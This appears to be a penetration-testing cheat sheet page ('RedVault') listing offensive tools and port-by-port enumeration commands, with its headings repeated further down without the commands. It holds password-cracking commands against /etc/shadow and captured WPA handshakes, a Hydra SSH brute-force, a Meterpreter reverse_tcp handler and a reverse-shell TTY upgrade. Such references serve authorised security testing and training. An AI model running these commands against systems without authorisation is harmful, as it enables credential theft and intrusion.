RedVault

Nmap

Installation:

sudo apt update && sudo apt install nmap -y

SYN scan plus version detection and default NSE scripts:

nmap -sS -sV -sC {{target}}

Official website: nmap.org

John the Ripper

Installation:

sudo apt update && sudo apt install john -y

Use rockyou wordlist to brute-force Linux `/etc/shadow` hashes

john --wordlist=/usr/share/wordlists/rockyou.txt /etc/shadow

Official website: openwall.com/john

Hydra

Installation:

sudo apt update && sudo apt install hydra -y

Attempt SSH logins using `users.txt` and `pass.txt`

hydra -L users.txt -P pass.txt ssh://{{target}} -t 4 -f

Official website: github.com/vanhauser-thc/thc-hydra

Gobuster

Installation:

sudo apt update && sudo apt install gobuster -y

Discover hidden directories on a web server with a wordlist

gobuster dir -u https://{{target}} -w /usr/share/wordlists/raft-large-directories.txt -t 50

Official website: github.com/OJ/gobuster

ffuf

Installation:

sudo apt update && sudo apt install ffuf -y

Fuzz URL paths or parameters to find hidden endpoints

ffuf -u https://{{target}}/FUZZ -w /usr/share/wordlists/raft-large-words.txt -t 100

Official website: github.com/ffuf/ffuf

Airodump-ng

Installation:

sudo apt update && sudo apt install aircrack-ng -y

Monitor and save WPA/WPA2 handshake packets from a target BSSID

sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w dump wlan0mon

Official website: aircrack-ng.org

Aircrack-ng

Installation:

sudo apt update && sudo apt install aircrack-ng -y

Use rockyou wordlist to crack the captured `.cap` file

aircrack-ng -w /usr/share/wordlists/rockyou.txt dump-01.cap

Official website: aircrack-ng.org

Metasploit

Installation:

sudo apt update && sudo apt install metasploit-framework -y

Launch a Meterpreter reverse_tcp handler on `LHOST:LPORT`

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 10.0.0.1; set LPORT 4444; run"

Official website: metasploit.com

dCode: Caesar Cipher Online Encoder/Decoder

What it does:

– Sends your plaintext “HELLO” with a shift of 3 to the dCode

– Returns the encoded result “KHOOR”

Official website: dcode.fr/caesar-cipher

CyberChef: Web-Based Data “Recipe” Tool

Browser-based tool for on-the-fly encoding, decoding, encryption, hashing, and data analysis via a drag-and-drop “recipe” interface.

Official website: gchq.github.io/CyberChef

Upgrade Reverse Shell to Full PTY

Spawn an interactive Bash shell with proper TTY support with python3

python3 -c 'import pty; pty.spawn("/bin/bash")'

HTTP: Retrieve Headers

Default port 80 – Fetch HTTP response headers from a web server

curl -I http://{{target}}

Banner grab via Telnet (port 80)

telnet {{target}} 80

HTTPS: TLS Handshake & Certificate Details

Default port 443 – Open a TLS session and display certificate info

openssl s_client -connect {{target}}:443

Fetch verbose headers with curl over HTTPS (port 443)

curl -Iv https://{{target}}

SSH: Interactive Shell & SOCKS Proxy

Default port 22 – Open a remote shell session over SSH

ssh user@{{target}}

Establish a local SOCKS5 proxy on port 1080 via SSH (port 22)

ssh -D 1080 user@{{target}}

FTP: Connect & List Directory

Default port 21 – Open an FTP session (anonymous)

ftp {{target}}

Banner grab via netcat on port 21

nc {{target}} 21

DNS: Query A Record

Default port 53 (UDP/TCP) – Retrieve DNS A record for a domain

dig {{target}} A +short

Simple lookup via nslookup (port 53)

nslookup {{target}}

SMTP: Manual Mail Session

Default port 25 – Open connection to SMTP and interact manually

telnet {{target}} 25

Test SMTP with swaks utility (port 25)

swaks --to you@{{target}} --server {{target}}

SMB: List Shares

Default port 445 – Enumerate SMB shares anonymously

smbclient -L //{{target}} -N

Low-level RPC interaction with rpcclient (port 445)

rpcclient -U ´...´ {{target}}

RDP: Remote Desktop Connection

Default port 3389 – Connect to Windows RDP service

xfreerdp /v:{{target}}

Alternate client via rdesktop (port 3389)

rdesktop {{target}}

SNMP: Walk Public Community

Default port 161 – Enumerate SNMP data with default “public” community

snmpwalk -v2c -c public {{target}}

Check SNMP info with snmp-check script (port 161)

snmp-check {{target}}

Telnet: Unencrypted Shell

Default port 23 – Open a raw Telnet session

telnet {{target}} 23

NTP: Query Time Server

Default port 123 – Fetch current time from NTP server

ntpdate -q {{target}}

Display NTP peers with chronyc (port 123)

chronyc sources

MySQL: Connect & List Databases

Default port 3306 – Login to MySQL as root user

mysql -h {{target}} -u root -p ...

Show all databases (after login)

SHOW DATABASES;

Nmap

Installation:

SYN scan plus version detection and default NSE scripts:

John the Ripper

Installation:

Use rockyou wordlist to brute-force Linux /etc/shadow hashes

Hydra

Installation:

Attempt SSH logins using users.txt and pass.txt

Gobuster

Installation:

Discover hidden directories on a web server with a wordlist

ffuf

Installation:

Fuzz URL paths or parameters to find hidden endpoints

Airodump-ng

Installation:

Monitor and save WPA/WPA2 handshake packets from a target BSSID

Aircrack-ng

Installation:

Use rockyou wordlist to crack the captured .cap file

Metasploit

Installation:

Launch a Meterpreter reverse_tcp handler on LHOST:LPORT

dCode: Caesar Cipher Online Encoder/Decoder

What it does:

– Sends your plaintext “HELLO” with a shift of 3 to the dCode

– Returns the encoded result “KHOOR”

CyberChef: Web-Based Data “Recipe” Tool

Browser-based tool for on-the-fly encoding, decoding, encryption, hashing, and data analysis via a drag-and-drop “recipe” interface.

Upgrade Reverse Shell to Full PTY

Spawn an interactive Bash shell with proper TTY support with python3

HTTP: Retrieve Headers

Default port 80 – Fetch HTTP response headers from a web server

Banner grab via Telnet (port 80)

HTTPS: TLS Handshake & Certificate Details

Default port 443 – Open a TLS session and display certificate info

Fetch verbose headers with curl over HTTPS (port 443)

SSH: Interactive Shell & SOCKS Proxy

Default port 22 – Open a remote shell session over SSH

Establish a local SOCKS5 proxy on port 1080 via SSH (port 22)

FTP: Connect & List Directory

Default port 21 – Open an FTP session (anonymous)

Banner grab via netcat on port 21

DNS: Query A Record

Default port 53 (UDP/TCP) – Retrieve DNS A record for a domain

Simple lookup via nslookup (port 53)

SMTP: Manual Mail Session

Default port 25 – Open connection to SMTP and interact manually

Test SMTP with swaks utility (port 25)

SMB: List Shares

Default port 445 – Enumerate SMB shares anonymously

Low-level RPC interaction with rpcclient (port 445)

RDP: Remote Desktop Connection

Default port 3389 – Connect to Windows RDP service

Alternate client via rdesktop (port 3389)

SNMP: Walk Public Community

Default port 161 – Enumerate SNMP data with default “public” community

Check SNMP info with snmp-check script (port 161)

Telnet: Unencrypted Shell

Default port 23 – Open a raw Telnet session

NTP: Query Time Server

Default port 123 – Fetch current time from NTP server

Display NTP peers with chronyc (port 123)

MySQL: Connect & List Databases

Default port 3306 – Login to MySQL as root user

Show all databases (after login)

Use rockyou wordlist to brute-force Linux `/etc/shadow` hashes

Attempt SSH logins using `users.txt` and `pass.txt`

Use rockyou wordlist to crack the captured `.cap` file

Launch a Meterpreter reverse_tcp handler on `LHOST:LPORT`